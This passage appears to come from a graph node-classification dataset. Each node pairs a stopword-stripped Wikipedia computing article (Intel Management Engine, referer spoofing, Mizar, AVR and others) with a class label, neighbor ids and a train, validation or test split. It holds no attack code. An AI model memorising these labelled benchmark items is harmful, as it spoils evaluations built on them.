study also observed geographical location dirty servers suggested cause could use unlicensed copies windows could obtain security updates microsoft blog post 28 april 2009 microsoft noted supplies security updates everyone without genuine verification 2013 mass surveillance disclosures made widely known iis particularly bad supporting perfect forward secrecy pfs especially used conjunction internet explorer possessing one long term asymmetric secret keys used establish https session make easier derive short term session key decrypt conversation even later time diffie–hellman key exchange dhe elliptic curve diffie–hellman key exchange ecdhe 2013 ones known property 30 firefox opera chromium browser sessions use nearly 0 apple safari microsoft internet explorer sessions",
    "neighbors": [
      9217,
      5636,
      11270,
      10248,
      5643,
      2060,
      4624,
      537,
      540,
      5660,
      3102,
      5666,
      8227,
      8740,
      9762,
      1577,
      5673,
      2603,
      44,
      8745,
      10281,
      10800,
      4658,
      2101,
      8757,
      6714,
      10812,
      64,
      3648,
      10310,
      1098,
      7754,
      76,
      4173,
      4174,
      10828,
      9808,
      4178,
      595,
      10839,
      603,
      9819,
      3170,
      10338,
      617,
      5225,
      622,
      5230,
      9839,
      11376,
      4210,
      7796,
      4725,
      1656,
      6265,
      7290,
      4731,
      8315,
      11386,
      10879,
      8841,
      651,
      653,
      6797,
      2193,
      3218,
      9874,
      2196,
      10900,
      4248,
      7838,
      8350,
      4768,
      9377,
      3746,
      3235,
      4771,
      3237,
      6820,
      1703,
      8358,
      7338,
      6827,
      9387,
      2221,
      11439,
      3250,
      5300,
      9909,
      1206,
      7351,
      10939,
      2748,
      2749,
      4797,
      10428,
      4289,
      5314,
      2244,
      7364,
      8391,
      200,
      9420,
      10957,
      6869,
      4316,
      1757,
      2782,
      225,
      9442,
      8419,
      4836,
      4837,
      4326,
      2279,
      1770,
      6379,
      3308,
      8941,
      11500,
      10993,
      3827,
      3834,
      9981,
      1791,
      8959,
      11519,
      4356,
      11524,
      7430,
      3852,
      782,
      3856,
      3857,
      8976,
      7443,
      790,
      3351,
      5401,
      7962,
      3867,
      8473,
      8985,
      8988,
      11546,
      11549,
      7457,
      7970,
      8994,
      5413,
      2854,
      1832,
      3881,
      5928,
      10024,
      10026,
      1837,
      10029,
      7983,
      3890,
      1844,
      9525,
      9014,
      9527,
      10039,
      5433,
      11572,
      2364,
      6972,
      6462,
      7484,
      2880,
      3394,
      3401,
      9033,
      6990,
      3922,
      1363,
      11605,
      8536,
      5465,
      5470,
      11103,
      865,
      2402,
      2404,
      6500,
      2919,
      4458,
      6506,
      4972,
      9066,
      9580,
      10611,
      6520,
      9593,
      3966,
      2943,
      1920,
      11134,
      899,
      4485,
      3462,
      1418,
      5003,
      5004,
      1935,
      8080,
      1937,
      11154,
      4505,
      412,
      11677,
      8094,
      929,
      11682,
      11683,
      9125,
      4010,
      11693,
      430,
      6062,
      10673,
      2485,
      9655,
      5048,
      6584,
      1978,
      7608,
      960,
      1474,
      8132,
      8644,
      1991,
      5063,
      969,
      6088,
      10190,
      3535,
      4561,
      4051,
      8659,
      11221,
      6614,
      471,
      3545,
      1498,
      5594,
      8157,
      478,
      6114,
      6115,
      8681,
      4074,
      6637,
      9709,
      6641,
      8691,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 4440,
    "label": 4,
    "text": "NetCentrics:netcentrics netcentrics corporation based herndon virginia contractor us federal government netcentrics provides enterprise cloud cybersecurity services netcentrics founded 1995 bob dixon bob dougherty company first ceo july 2017 cynthia barreda succeeded dougherty current ceo netcentrics recognized comparably 2017 2018 receiving total 13 awards including best companies dc best ceo best company diversity best company outlook 2018 barreda recognized dca live federal entrepreneur netcentrics recognized one fastest growing cybersecurity companies washington metropolitan area",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4441,
    "label": 3,
    "text": "Ralf_Brown's_Interrupt_List:ralf brown interrupt list ralf brown interrupt list aka rbil x86 interrupt list ms-dos interrupt list inter comprehensive list interrupts calls hooks interfaces data structures cmos settings memory port addresses well processor opcodes special function registers x86 machines including many clones start pc era 1981 2000 still applying pcs today list covers operating systems device drivers application software documented undocumented information including bugs incompatibilities shortcomings workarounds version locale date information often detail level far beyond found contemporary literature large part covers system bioses internals operating systems dos os/2 windows well interactions widely used resource ibm pc system developers analysts well application programmers pre-windows era parts compiled information used creation several books systems programming also translated chinese japanese russian compilation proven important resource developing various closed open source operating systems including linux freedos today still used reference bios calls develop programs dos well system-level software project result research collaborative effort 650 listed contributors worldwide period 15 years 290 provided significant information 55 even original list created january 1985 janet jack others named interrupt list ms-dos subsequently maintained mailed requestors usenet ross m. greenberg 1986 since october 1987 maintained ralf d. brown researcher carnegie mellon university language technologies institute information several interrupt listings merged list order establish one comprehensive reference compilation years michael a. shiels timothy patrick farley matthias r. paul robin d. h. walker wolfgang lierz tamura jones became major contributors project providing information list project also expanded include pc development related information therefore absorbed number independently maintained lists pc i/o ports wim osterholt matthias r. paul bios cmos memory contents atley padgett peterson processor opcodes alex v. potemkin bugs harald feldmann brown paul also conducted several systematic surveys specific hard- software details among number dedicated user groups order validate info help fill gaps list originally list distributed archive named interrup various compression formats well form diffs distribution file name changed include version form internyy n issue number yy 2-digit release year 1988 mid 1989 distribution settled use zip compression archive reached size 360 kb floppy june 1991 distribution split several files following interrrp.zip naming scheme rr revision starting 26 version 91.3 p part indicator package starting letter officially named ms-dos interrupt list x86 interrupt list abbreviated inter maintainer community coined unofficial name ralf brown interrupt list abbreviated rbil 1990s publication currently revision 61 17 july 2000 almost 8 mb ascii text including close entries plus tables fully cross linked would result 3700 pages 60 lines per page condensed information printed interrupt list makes 5.5 mb 2500 pages printed project officially abandoned website still maintained 2018 new releases forthcoming long time despite fact information still pending release even inter61 release 2000 new releases planned several times 2001 2002 materialize portions new information dos pc internals provided paul circulated preliminary form development community peer-review assist operating system development",
    "neighbors": [
      3841,
      389,
      2055,
      7560,
      10121,
      6797,
      9340,
      3350,
      292,
      7983,
      9775,
      8241,
      178,
      9907,
      9525,
      823,
      10173,
      5312,
      2380,
      7501,
      9166,
      5457,
      4563,
      5971,
      9557,
      10068,
      5856,
      9569,
      6118,
      6506,
      1515,
      9066,
      8301,
      6129,
      499,
      372,
      11513,
      1915,
      4092
    ],
    "mask": "Train"
  },
  {
    "node_id": 4442,
    "label": 4,
    "text": "Usher_(software):usher software usher enterprise security platform released microstrategy inc. 2015 technology designed replace user-entered passwords biometric identity multi-step authentication methods features digital badges geo-fencing administration options service takes form mobile application allows users access physical digital space based passive identification methods facial recognition bluetooth discovery etc usher positioned password killer based moving towards security credentials tied identity place applications managed via usher include salesforce.com google apps select microsoft software security features product backed usher analytics allows administrators assess data real time identify threats behavioral abnormalities organizations use usher include",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 4443,
    "label": 3,
    "text": "The_Goonies_(MSX_video_game):goonies msx video game goonies 1986 platform game konami msx based film name music simple rendition song goonies r good enough cyndi lauper goonies platform puzzle game featuring five 'scenes successfully completed scene key word given thus player continue game point time",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4444,
    "label": 4,
    "text": "Intel_Management_Engine:intel management engine intel management engine also known manageability engine autonomous subsystem incorporated virtually intel processor chipsets since 2008 located platform controller hub modern intel motherboards part intel active management technology allows system administrators perform tasks machine remotely system administrators use turn computer login remotely computer regardless whether operating system installed intel management engine always runs long motherboard receiving power even computer turned ime attractive target hackers since top level access devices completely bypasses operating system intel released much information intel management engine prompting speculation may include backdoor electronic frontier foundation voiced concern ime amd processors similar feature called amd secure technology subsystem primarily consists proprietary firmware running separate microprocessor performs tasks boot-up computer running asleep long chipset soc connected current via battery power supply continues run even system turned intel claims required provide full performance exact workings largely undocumented code obfuscated using confidential huffman tables stored directly hardware firmware contain information necessary decode contents intel main competitor amd incorporated equivalent amd secure technology formally called platform security processor virtually post-2013 cpus starting 11 based intel quark x86-based 32-bit cpu runs minix 3 operating system state stored partition spi flash using embedded flash file system effs previous versions based arc core management engine running threadx rtos versions 1.x 5.x used arctangent-a4 32-bit instructions whereas versions 6.x 8.x used newer arcompact mixed 32- 16-bit instruction set architecture starting 7.1 arc processor could also execute signed java applets mac ip address out-of-band interface direct access ethernet controller one portion ethernet traffic diverted even reaching host operating system support exists various ethernet controllers exported made configurable via management component transport protocol mctp also communicates host via pci interface linux communication host done via /dev/mei release nehalem processors usually embedded motherboard northbridge following memory controller hub mch layout newer intel architectures intel 5 series onwards included platform controller hub pch intel current terminology 2017 one several firmware sets converged security manageability engine csme prior amt version 11 csme called intel management engine bios extension intel mebx russian company positive technologies dmitry sklyarov found firmware version 11 runs minix 3 several weaknesses found may 1 2017 intel confirmed remote elevation privilege bug sa-00075 management technology every intel platform provisioned intel standard manageability active management technology small business technology nehalem 2008 kaby lake 2017 remotely exploitable security hole several ways disable without authorization could allow functions sabotaged found additional major security flaws affecting large number computers incorporating trusted execution engine txe server platform services sps firmware skylake 2015 coffee lake 2017 confirmed intel 20 november 2017 sa-00086 unlike sa-00075 bug even present amt absent provisioned disabled known unofficial methods july 2018 another set vulnerabilitites disclosed sa-00112 september 2018 yet another vulnerability published sa-00125 normally possible user disable undocumented methods discovered however methods supported intel security architecture designed prevent disabling thus possibility considered intel security vulnerability example virus could abuse make computer lose functionality typical end-user expects ability play media drm hand malicious actor could use remotely compromise system strictly speaking none known methods disables completely since required booting main cpu known methods merely make go abnormal states soon boot seems working functionality still physically connected current microprocessor continuing execute code 2016 me_cleaner project found integrity verification broken supposed detect tampered case shut pc forcibly every 30 minutes system start prevents compromised system running undetected yet allows owner fix issue flashing valid version firmware grace period project found making unauthorized changes firmware possible force abnormal error state prevented triggering shutdown even large parts firmware overwritten thus made inoperable august 2017 russian company positive technologies dmitry sklyarov published method disable via undocumented built-in mode intel confirmed contains switch enable government authorities nsa make go high-assurance platform hap mode boot mode disables functions authorized use government authorities supposed available machines produced yet turned machines sold retail market tricked activating switch.. manipulation hap bit quickly incorporated me_cleaner project late 2017 several laptop vendors announced intentions ship laptops intel disabled none two methods disable discovered far turned effective countermeasure sa-00086 vulnerability vulnerability early-loaded module essential boot main cpu ring −3 rootkit demonstrated invisible things lab q35 chipset work later q45 chipset intel implemented additional protections exploit worked remapping normally protected memory region top 16 mb ram reserved rootkit could installed regardless whether amt present enabled system chipset always contains arc coprocessor −3 designation chosen coprocessor works even system s3 state thus considered layer system management mode rootkits vulnerable q35 chipset keystroke logger me-based rootkit demonstrated patrick stewin another security evaluation vassilios ververis showed serious weaknesses gm45 chipset implementation particular criticized amt transmitting unencrypted passwords smb provisioning mode ide redirection serial lan features used also found zero touch provisioning mode ztc still enabled even amt appears disabled bios 60 euros ververis purchased go daddy certificate accepted firmware allows remote zero touch provisioning possibly unsuspecting machines broadcast hello packets would-be configuration servers may 2017 intel confirmed many computers amt unpatched critical privilege escalation vulnerability cve-2017-5689 vulnerability nicknamed silent bob silent researchers reported intel affects numerous laptops desktops servers sold dell fujitsu hewlett-packard later hewlett packard enterprise hp inc. intel lenovo possibly others researchers claimed bug affects systems made 2010 later reports claimed bug also affects systems made long ago 2008 vulnerability described giving remote attackers june 2017 platinum cybercrime group became notable exploiting serial lan sol capabilities amt perform data exfiltration stolen documents months previous bugs subsequent warnings eff security firm positive technologies claimed developed working exploit 20 november 2017 intel confirmed number serious flaws found management engine mainstream trusted execution engine tablet/mobile server platform services high end server firmware released critical firmware update essentially every intel-based computer last several years including desktops servers found vulnerable security compromised although potential routes exploitation entirely known possible patch problems operating system firmware uefi bios update motherboard required anticipated take quite time many individual manufacturers accomplish ever would many systems none known unofficial methods disable prevent exploitation vulnerability firmware update vendor required however discovered vulnerability note firmware updates fully effective either attacker access firmware region simply flash old vulnerable version exploit bug july 2018 intel announced 3 vulnerabilities cve-2018-3628 cve-2018-3629 cve-2018-3632 discovered patch csme firmware would required intel indicated would patch 3rd generation core processors earlier despite chips chipsets far back intel core 2 duo vpro intel centrino 2 vpro affected critics like electronic frontier foundation eff security expert damien zammit accused backdoor privacy concern zammit stresses full access memory without parent cpu knowledge full access tcp/ip stack send receive network packets independently operating system thus bypassing firewall intel responded saying intel put back doors products products give intel control access computing systems without explicit permission end user intel design backdoors access products recent reports claiming otherwise misinformed blatantly false intel participate efforts decrease security technology context criticism intel amd secure technology pointed nsa budget request 2013 contained sigint enabling project goal insert vulnerabilities commercial encryption systems systems … conjectured intel amd secure technology might part programme google attempting eliminate proprietary firmware servers found hurdle shortly sa-00086 patched vendors amd processor mainboards started shipping bios updates allow disabling amd secure technology subsystem similar function management engine often confused intel amt amt runs available processors vpro amt enables owners remote administration computer like turning reinstalling operating system however built intel chipsets since 2008 amt amt unprovisioned owner official documented way disable",
    "neighbors": [
      5384,
      3337,
      4491,
      3473,
      5649,
      7313,
      8978,
      9369,
      26,
      9371,
      9500,
      9137,
      7354,
      5309,
      8125,
      2111,
      833,
      6339,
      9541,
      3537,
      2514,
      7377,
      2516,
      7387,
      2525,
      7519,
      8035,
      1638,
      7783,
      107,
      8171,
      5358,
      9582,
      1776,
      499,
      1400,
      5883
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4445,
    "label": 4,
    "text": "Positive_Hack_Days:positive hack days positive hack days phdays computer security conference held every year moscow first conference held 2011 conference addresses topics zero-day attacks digital investigations cryptography cyberwarfare security person state cyberworld attendance fee required free tickets available winners special hacking contests students participated positive education program phdays aimed wide range audience hackers technical experts businessmen politicians presentations given russian english first conference held may 19 2011 reports workshops covered topics government control information security russia internet banking system safety secure connection voip protection data cloud virtualization system security keynote speaker event dmitry sklyarov conference capture flag ctf competition held among information security specialists different countries u.s. team ppp winner hacking contests one participant detected zero-day vulnerability safari windows among speakers experts kaspersky lab russian agricultural bank vimpelcom rostelecom cisco systems leta it-company positive technologies pwc 500 people attended one-day event second conference conducted may 30 31 2012 digital october center new technologies along six parallel streams presentations workshops ctf competition security-related contests held topics divided two areas technical exploiting radio noise password protection telecom security usage sqlmap business internet banking security data leakage government seeking specialists information security conference featured bruce schneier american cryptographer author applied cryptography datuk mohd noor amin impact un alexander peslyak known solar designer creator password cracking tool john ripper significant events include demonstration zero-day vulnerabilities windows xp freebsd 8.3 cracking iphone 4s contests taking control ar.drone analyzing internet banking system security young school competition young scientists research papers took place first time among conference participants representatives kaspersky lab national agency computer security tunisia cisco systems eset openwall project highload lab companies phdays 2012 gathered 2,000 people third conference held may 23 24 world trade center among main topics ics protection web application mobile application security preventing attacks banking systems cooperation government researchers information society marc van hauser heuse creator thc-hydra amap susefirewall founder hacker choice became leading speaker significant events include report scada strangelove security siemens simatic software workshop hacking atm workshop open organisation lockpickers experts nondestructive lock opening model railroad controlled real industrial systems labyrinth rooms laser field motion detectors george hotz geohot participated ctf contest member ppp first unlock iphone allowed using providers besides george hotz also 2drunk2hack contest participants hack web applications strong drink fail specialists kaspersky lab cisco systems nokia rsa iponweb qualys visited conference phdays iii saw 2,500 attendees movie preparation conference released 2013 conference took place may 21 22 2014 digital october among main topics protection ics critical infrastructure components internet banking system security internet things regulation information security industry cyberwarfare alisa shevchenko detected several zero-day vulnerabilities indusoft web studio 7.1 contest analyzing ics security significant events include contest identifying threats smart home discussion security telecommunications companies lack really smart grids power industry security-related competition participants managed withdraw money banking system developed especially competition filled vulnerabilities commonly occur real internet banking systems specialists kaspersky lab cisco systems revuln toool parameter security took part conference phdays iv drew 2,500 attendees conference held 26 27 may 2015 world trade center moscow russia conference held 17 18 may 2016 world trade center moscow russia conference held 23 24 may 2017 world trade center moscow russia conference held 15 16 may 2018 12 krasnopresnenskaya embankment moscow russia conference held 21 22 may 2019 crocus expo international exhibition center moscow russia technical reports workshops competitions discussions regulation industry business development commonly held phdays however feature conference providing special activities aimed creating open cyberpunk atmosphere conference always ends live performances popular russian rock bands 2014 cyberpunk movies played night two days conference",
    "neighbors": [
      7778,
      2275,
      4140,
      9518,
      10894,
      8787,
      11191,
      7449
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4446,
    "label": 9,
    "text": "Mizar_system:mizar system mizar system consists formal language writing mathematical definitions proofs proof assistant able mechanically check proofs written language library formalized mathematics used proof new theorems system maintained developed mizar project formerly direction founder andrzej trybulec 2009 mizar mathematical library largest coherent body strictly formalized mathematics existence mizar project started around 1973 andrzej trybulec attempt reconstruct mathematical vernacular checked computer current goal apart continual development mizar system collaborative creation large library formally verified proofs covering core modern mathematics line influential qed manifesto currently project developed maintained research groups białystok university poland university alberta canada shinshu university japan mizar proof checker remains proprietary mizar mathematical library—the sizable body formalized mathematics verified—is licensed open-source papers related mizar system regularly appear peer-reviewed journals mathematic formalization academic community include studies logic grammar rhetoric intelligent computer mathematics interactive theorem proving journal automated reasoning journal formalized reasoning distinctive feature mizar language readability common mathematical text relies classical logic declarative style mizar articles written ordinary ascii language designed close enough mathematical vernacular mathematicians could read understand mizar articles without special training yet language enables increased level formality necessary automated proof checking proof admitted steps justified either elementary logical arguments citing previously verified proofs results higher level rigor detail customary mathematical textbooks publications thus typical mizar article four times long equivalent paper written ordinary style formalization relatively labor-intensive impossibly difficult one versed system takes one week full-time work textbook page formally verified suggests benefits reach applied fields probability theory economics mizar mathematical library mml includes theorems authors refer newly written articles approved proof checker evaluated process peer-review appropriate contribution style accepted published associated journal formalized mathematics added mml july 2012 mml included 1150 articles written 241 authors aggregate contain 10,000 formal definitions mathematical objects 52,000 theorems proved objects 180 named mathematical facts benefited formal codification examples hahn–banach theorem kőnig lemma brouwer fixed point theorem gödel completeness theorem jordan curve theorem breadth coverage led suggest mizar one leading approximations qed utopia encoding core mathematics computer verifiable form mml articles available pdf form papers journal formalized mathematics full text mml distributed mizar checker freely downloaded mizar website ongoing recent project library also made available experimental wiki form admits edits approved mizar checker mml query website implements powerful search engine contents mml among abilities retrieve mml theorems proved particular type operator mml built axioms tarski–grothendieck set theory even though semantically objects sets language allows one define use syntactical weak types example set may declared type nat internal structure conforms particular list requirements turn list serves definition natural numbers set sets conform list denoted nat implementation types seeks reflect way mathematicians formally think symbols streamline codification distributions mizar proof checker major operating systems freely available download mizar project website use proof checker free non-commercial purposes written free pascal source code available members association mizar users",
    "neighbors": [
      9345,
      4612,
      4455,
      7185,
      11026,
      8627,
      4791,
      9816,
      8924,
      5663
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4447,
    "label": 4,
    "text": "Uniloc:uniloc uniloc corporation patent assertion entity founded australia 1992 develops try buy software distributed via magazines preinstalled new computers uniloc technology based patent granted inventor ric richardson also principal uniloc company original patent application dated late 1992 australia granted us 1996 covers technology popularly known product activation try buy software machine locking 1993 uniloc distributed try buy versions software multiple publishers via marketing agreement ibm initial success sale thousands copies software package first aid developed cybermedia distributed front cover windows sources magazine 1994 later uniloc worked us magazine publisher ziff davis distribute unlockable versions software front cover magazines including windows magazine 1997 us subsidiary set called uniloc pc preload produce preloaded unlockable editions popular software products new pcs distribution agreements executed emachines toshiba family pc magazine also produced two months magazines featuring unlockable software uniloc pc preload cover 2000 2003 uniloc corporation set us subsidiary called uniloc usa operates rhode island southern california company currently licensing patented technology software publishers entertainment companies including sega uniloc sued 73 companies alleges violated one copy-protection patents according uniloc 25 companies settled court due abstract nature patents litigious activities uniloc deemed patent troll critics uniloc sued microsoft 2003 violating patent relating technology designed deter software piracy 2006 us district judge william smith ruled favour microsoft appeals court overturned decision saying genuine issue material fact ruled case without hearing jury april 8 2009 rhode island jury found microsoft violated patent told microsoft pay uniloc 388 million damages success uniloc filed new patent infringement suits sony america mcafee activision quark borland software aspyr media decision microsoft subsequently overturned september 29 2009 judge smith vacated jury verdict ruled favour microsoft saying jury lacked grasp issues reached finding without legally sufficient basis uniloc appealed judge decision alleging bias 2011 jury verdict reinstated microsoft us court appeals federal circuit said instead using usual 25 percent rule damage awards infringement would need recalculated july 20 2012 uniloc filed lawsuit mojang citing minecraft pocket edition infringement upon patents claiming exclusive rights method software license checking markus persson mojang stated believe minecraft infringes uniloc us patent 6,857,067 mojang ab defend lawsuit lawsuit also filed android game developers including electronic arts maker bejeweled 2 laminar research maker x-plane distinctive developments gameloft halfbrick studios madfinger games square enix",
    "neighbors": [
      440,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4448,
    "label": 4,
    "text": "Security_awareness:security awareness security awareness knowledge attitude members organization possess regarding protection physical especially informational assets organization many organizations require formal security awareness training workers join organization periodically thereafter usually annually topics covered security awareness training include security aware means understand potential people deliberately accidentally steal damage misuse data stored within company computer systems throughout organization therefore would prudent support assets institution information physical personal trying stop happening according european network information security agency 'awareness risks available safeguards first line defence security information systems networks 'the focus security awareness consultancy achieve long term shift attitude employees towards security whilst promoting cultural behavioural change within organisation security policies viewed key enablers organisation series rules restricting efficient working business 2016 study developed method measuring security awareness specifically measured understanding circumventing security protocols disrupting intended functions systems collecting valuable information getting caught p. 38 researchers created method could distinguish experts novices people organize different security scenarios groups experts organize scenarios based centralized security themes novices organize scenarios based superficial themes",
    "neighbors": [
      5636,
      11526,
      3528,
      5327,
      433,
      2737,
      8881,
      7156,
      3125,
      3447,
      7515
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4449,
    "label": 3,
    "text": "Palm_i705:palm i705 palm i705 upgrade last series palm pdas use discontinued palm.net service access world wide web palm devices featured 8mb onboard memory sd/mmc slots used motorola dragonball vz 33 mhz processor ran palm os 4.1 noted first palm.net capable device without flip antenna internal rechargeable battery though third three models manufactured palm",
    "neighbors": [
      2308,
      10500,
      6790,
      3606,
      8982,
      6178,
      5164,
      7983,
      9013,
      694,
      5318,
      3017,
      11337,
      9037,
      2258,
      1621,
      4832,
      2285,
      1776,
      2420,
      119,
      8952,
      9598
    ],
    "mask": "None"
  },
  {
    "node_id": 4450,
    "label": 3,
    "text": "Atmel_AVR_instruction_set:atmel avr instruction set atmel avr instruction set machine language atmel avr modified harvard architecture 8-bit risc single chip microcontroller developed atmel 1996 avr one first microcontroller families use on-chip flash memory program storage 32 general-purpose 8-bit registers r0–r31 arithmetic logic operations operate registers load store instructions access ram limited number instructions operate 16-bit register pairs lower-numbered register pair holds least significant bits must even-numbered last three register pairs used pointer registers memory addressing known x r27 r26 r29 r28 z r31 r30 postincrement predecrement addressing modes supported three z also support six-bit positive displacement instructions allow immediate value limited registers r16–r31 8-bit operations register pairs r25 r24–r31 r30 16-bit operations adiw sbiw variants mul operation limited eight registers r16 r23 addition 32 general-purpose registers cpu special-purpose registers status register bits following address spaces available first 64 i/o registers accessible i/o data address space therefore two different addresses usually written 0x00 0x20 0x3f 0x5f first item i/o address second parentheses data address special-purpose cpu registers exception pc accessed i/o registers registers rampx rampy may present machines less 64 kib addressable memory typical atmega memory map may look like ramend last ram address parts lacking extended i/o ram would start 0x0060 arithmetic operations work registers r0–r31 directly ram take one clock cycle except multiplication word-wide addition adiw sbiw take two cycles ram i/o space accessed copying registers indirect access including optional postincrement predecrement constant displacement possible registers x z accesses ram takes two clock cycles moving registers i/o one cycle moving eight sixteen bit data registers constant register also one cycle reading program memory lpm takes three cycles instructions one 16-bit word long save including 16-bit 22-bit address take two words two types conditional branches jumps address skips conditional branches brxx test alu flag jump specified address skips sbxx test arbitrary bit register i/o skip next instruction test true following instructions implemented atmel avr controllers case instructions performing multiplications extended loads/jumps/calls long jumps power control optional instructions may grouped three categories higher-end processors tend capable cores memory presence one guarantee presence beginning original classic core enhancements organized following levels includes preceding less capable classic cpu cores two subsets avr1 core avr tiny confusingly attiny branded processors variety cores including avr1 attiny11 attiny28 classic attiny22 attiny26 classic+ attiny24 avrtiny attiny20 attiny40 avr1 subset popular new models introduced since 2000 omits ram except 32 registers mapped address 0–31 i/o ports addresses 32–95 stack replaced 3-level hardware stack codice_7 codice_8 instructions deleted 16-bit operations deleted codice_9 codice_10 load store addressing modes except indirect via z second successful attempt subset avr instruction set avr tiny core significant change avrtiny core omits registers r0–r15 registers also memory-mapped i/o ports 0–63 general-purpose ram beginning address 64 16-bit arithmetic operations codice_11 codice_12 omitted load/store displacement addressing modes codice_13 codice_14 predecrement postincrement addressing modes retained codice_1 instruction omitted instead program rom mapped data address space may accessed normal load instructions finally avrtiny core deletes 2-word codice_16 codice_17 instructions direct ram addressing instead uses opcode space previously assigned load/store displacement instructions new 1-word codice_16 codice_17 instructions access first 128 locations general-purpose ram addresses 0x40 0xbf codice_20 codice_21 instructions provide direct access i/o space 0 0x3f smallest cores ≤256 bytes data address space meaning ≤128 bytes ram i/o ports reserved addresses removed ≤8192 bytes 8 kib program rom 8-bit stack pointer spl support 12-bit relative jump/call instructions codice_22/codice_23 avr program counter counts 16-bit words bytes 12-bit offset sufficient address 2 bytes rom additional memory addressing capabilities present required access available resources three instructions present models corresponding hardware facility architectures avr1 named according avr-libc conventions bit assignments atmel avr uses many split fields bits contiguous instruction word load/store offset instructions extreme example 6-bit offset broken three pieces",
    "neighbors": [
      2051,
      1798,
      682,
      10603,
      9391,
      602
    ],
    "mask": "Test"
  },
  {
    "node_id": 4451,
    "label": 3,
    "text": "Socket_AM2+:socket am2+ socket am2+ cpu socket immediate successor socket am2 used several amd processors athlon 64 x2 socket am2+ mid-migration socket am2 socket am3 am2+ am2 socket cpus motherboards potential operate together actual interoperability depends upon factors especially availability compatible bios software pc retailers dell provided compatible bios versions allow use socket am2+ cpus products utilizing socket am2 motherboards inspiron 531 main differences socket am2 am2+ socket processors follows technical documentation readily available earlier generations amd processor sockets am2r2 processor functional data sheet amd document number 41607 made publicly available amd confirmed am2 processors work am2+ motherboards am2+ processors work am2 motherboards however operation am2+ processors am2 motherboards limited specifications socket am2 1 ghz hypertransport 2.0 one power plane cores imc am2 processors benefit faster hypertransport 3.0 separate power planes am2+ motherboards am2 components am2+ cpus motherboards designed use ddr2 ram exclusively many manufacturers dell case inspiron 531 yet may choose release bios updates would enable compatibility result consumers unable upgrade pcs am2+ cpus despite technically possible instead would buy new motherboard upgrade processor msi simply stated am2 motherboards compatible am2+ processors amd confirmed upgrade path socket am2+ am3 pin configuration am2+ socket 940 pins mechanically different am3 socket 941 pins 4 holes fastening heatsink motherboard placed rectangle lateral lengths 48 mm 96 mm amd sockets socket am2 socket am2+ socket am3 socket am3+ socket fm2 cooling solutions therefore interchangeable motherboard manufacturers e.g asrock jetway msi released hybrid motherboards equipped am2+ socket ddr2 ddr3 memory slots boards permit use am2/am2+ processors ddr2 ram am3 processors either ddr2 ddr3 ram sole principal change am2+ am3 support ddr3 sdram am3+ modification am3 socket designed cpus use bulldozer microarchitecture",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      3464,
      4872,
      7058,
      10260,
      4767,
      2463,
      7712,
      9122,
      1322,
      11183,
      1329,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      7247,
      9551,
      7122,
      9427,
      10715,
      7132,
      2525,
      5859,
      1260,
      7788,
      7151,
      1137,
      1651
    ],
    "mask": "Test"
  },
  {
    "node_id": 4452,
    "label": 1,
    "text": "Polymorphic_association:polymorphic association polymorphic association term used discussions object-relational mapping respect problem representing relational database domain relationship one class multiple classes statically typed languages java multiple classes subclasses superclass languages duck typing ruby necessarily case java persistence hibernate chapter 5 bauer christian gavin king manning copyright 2007",
    "neighbors": [
      9286,
      6860,
      5677,
      2556,
      9245
    ],
    "mask": "Test"
  },
  {
    "node_id": 4453,
    "label": 4,
    "text": "Referer_spoofing:referer spoofing http networking typically world wide web referer spoofing based canonised misspelling referrer sends incorrect referer information http request order prevent website obtaining accurate data identity web page previously visited user referer spoofing typically done data privacy reasons testing order request information without genuine authority web servers may supply response requests specific http referers improve privacy individual browser users may replace accurate referer data inaccurate data though many simply suppress browser sending referer data sending referrer information technically spoofing though sometimes also described software systems networks testing sometimes penetration testing referer spoofing often part larger procedure transmitting accurate inaccurate well expected unexpected input httpd system tested observing results many web sites configured gather referer information serve different content depending referer information obtained exclusively relying http referer information authentication authorization purposes genuine computer security measure http referer information freely alterable interceptable password though poorly configured systems treat websites especially many image hosting sites use referer information secure materials browsers arriving web pages served images additionally site may want users click pages advertisements directly able access downloadable file — using referring page referring site information help site redirect unauthorized users landing page site would like use attackers acquire knowledge approved referers often trivial many sites follow common template use information combined exploit gain access materials spoofing often allows access site content site web server configured block browsers send referer headers website owners may disallow hotlinking also used defeat referer checking controls used mitigate cross-site request forgery attacks several software tools exist facilitate referer spoofing web browsers extensions popular browsers mozilla firefox internet explorer may provide facilities customise manage referrer urls website user visits tools include proxy servers individual configures browser send http requests proxy forwards different headers intended website usually removing modifying referer header proxies may also present privacy issues users may log user activity",
    "neighbors": [
      225,
      4163,
      7044,
      2470,
      7368,
      8202,
      1899,
      3473,
      4945,
      4725,
      5621,
      119,
      5433,
      5724,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4454,
    "label": 9,
    "text": "OpenModelica:openmodelica openmodelica free open source environment based modelica modeling language modeling simulating optimizing analyzing complex dynamic systems software actively developed open source modelica consortium non-profit non-governmental organization open source modelica consortium run project rise sics east ab collaboration linköping university openmodelica used academic industrial environments industrial applications include use openmodelica along proprietary software fields power plant optimization automotive water treatment openmodelica compiler omc modelica compiler translating modelica c code symbol table containing definitions classes functions variables definitions predefined user-defined obtained libraries compiler also includes modelica interpreter interactive usage constant expression evaluation subsystem also includes facilities building simulation executables linked selected numerical ode dae solvers omc written metamodelica unified equation-based semantical mathematical modeling language bootstrapped openmodelica connection editor open source graphical user interface creating editing simulating modelica models textual graphical modes omedit communicates omc interactive api requests model information creates models/connection diagrams based modelica annotations implementation based c++ qt library openmodelica shell omshell interactive command line interface parses interprets commands modelica expressions evaluation simulation plotting etc session handler also contains simple history facilities completion file names certain identifiers commands openmodelica notebook omnotebook light-weight mathematica-style editor modelica implements interactive wysiwyg realization literate programming form programming programs integrated documentation document omnotebook primarily used teaching allows mix hierarchically structured text cells containing modelica models expressions evaluated simulated plotted results displayed directly omnotebook ompython python interface enabling users access modeling simulation capabilities openmodelica python uses corba omniorb zeromq communicate openmodelica scripting api mdt eclipse plugin integrates openmodelica compiler eclipse provides editor advanced 